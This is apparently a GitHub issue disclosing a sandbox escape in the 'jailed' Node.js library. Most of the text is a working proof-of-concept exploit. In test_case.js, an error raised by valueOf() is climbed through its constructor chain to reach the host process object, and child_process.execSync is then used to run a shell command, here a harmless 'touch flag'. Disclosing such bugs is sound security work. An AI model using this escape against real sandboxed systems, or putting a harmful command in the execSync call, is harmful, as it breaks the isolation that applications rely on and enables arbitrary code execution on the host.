Sandbox Escape Bug in jailed with Node.js #66
Description
-
Jailed version: 0.3.1
-
Node version: 18.15.0
-
run-jailed.js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);test_case.js
try{
valueOf()
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();Sandbox can be escaped by calling valueOf() function.
Also, we can execute arbitrary shell code using process module.